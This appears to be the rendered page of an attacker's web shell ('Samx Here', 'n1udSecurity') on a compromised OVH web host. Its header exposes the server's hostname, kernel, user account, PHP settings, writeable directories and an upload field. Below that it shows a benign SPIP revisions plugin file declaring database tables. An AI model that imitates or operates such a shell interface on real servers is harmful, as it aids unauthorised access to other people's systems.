Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins-dist/revisions/base/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins-dist/revisions/base/revisions.php
<?php

/***************************************************************************\
 *  SPIP, Système de publication pour l'internet                           *
 *                                                                         *
 *  Copyright © avec tendresse depuis 2001                                 *
 *  Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James  *
 *                                                                         *
 *  Ce programme est un logiciel libre distribué sous licence GNU/GPL.     *
\***************************************************************************/

/**
 * Déclarations relatives à la base de données
 *
 * @package SPIP\Revisions\Pipelines
 **/

if (!defined('_ECRIRE_INC_VERSION')) {
	return;
}

/**
 * Déclarer les interfaces des tables versions pour le compilateur
 *
 * @pipeline declarer_tables_interfaces
 * @param array $interface
 *     Déclarations d'interface pour le compilateur
 * @return array
 *     Déclarations d'interface pour le compilateur
 */
function revisions_declarer_tables_interfaces($interface) {

	$interface['table_des_tables']['versions'] = 'versions';

	return $interface;
}

/**
 * Déclaration des jointures génériques
 *
 * @pipeline declarer_tables_objets_sql
 * @param array $tables
 *     Description des tables
 * @return array
 *     Description complétée des tables
 */
function revisions_declarer_tables_objets_sql($tables) {

	// jointures sur les mots pour tous les objets
	$tables[]['tables_jointures'][] = 'versions';

	return $tables;
}


/**
 * Déclarer les tables versions et fragments
 *
 * @pipeline declarer_tables_auxiliaires
 * @param array $tables_auxiliaires
 *     Description des tables
 * @return array
 *     Description complétée des tables
 */
function revisions_declarer_tables_auxiliaires($tables_auxiliaires) {

	$spip_versions = [
		'id_version' => 'bigint(21) DEFAULT 0 NOT NULL',
		'id_objet' => 'bigint(21) DEFAULT 0 NOT NULL',
		'objet' => "VARCHAR (25) DEFAULT '' NOT NULL",
		'date' => "datetime DEFAULT '0000-00-00 00:00:00' NOT NULL",
		'id_auteur' => "VARCHAR(23) DEFAULT '' NOT NULL", # stocke aussi IP(v6)
		'titre_version' => "text DEFAULT '' NOT NULL",
		'permanent' => "char(3) DEFAULT '' NOT NULL",
		'champs' => "text DEFAULT '' NOT NULL"
	];

	$spip_versions_key = [
		'PRIMARY KEY' => 'id_version, id_objet, objet',
		'KEY id_version' => 'id_version',
		'KEY id_objet' => 'id_objet',
		'KEY objet' => 'objet'
	];
	$spip_versions_join = [
		'id_version' => 'id_version',
		'id_objet' => 'id_objet',
		'objet' => 'objet',
		'id_auteur' => 'id_auteur',
	];

	$spip_versions_fragments = [
		'id_fragment' => "int unsigned DEFAULT '0' NOT NULL",
		'version_min' => "int unsigned DEFAULT '0' NOT NULL",
		'version_max' => "int unsigned DEFAULT '0' NOT NULL",
		'id_objet' => 'bigint(21) NOT NULL',
		'objet' => "VARCHAR (25) DEFAULT '' NOT NULL",
		'compress' => 'tinyint NOT NULL',
		'fragment' => 'longblob'  # ici c'est VRAIMENT un blob (on y stocke du gzip)
	];

	$spip_versions_fragments_key = [
		'PRIMARY KEY' => 'id_objet, objet, id_fragment, version_min'
	];


	$tables_auxiliaires['spip_versions'] = [
		'field' => &$spip_versions,
		'key' => &$spip_versions_key,
		'join' => &$spip_versions_join
	];

	$tables_auxiliaires['spip_versions_fragments'] = [
		'field' => &$spip_versions_fragments,
		'key' => &$spip_versions_fragments_key
	];

	return $tables_auxiliaires;
}

SAMX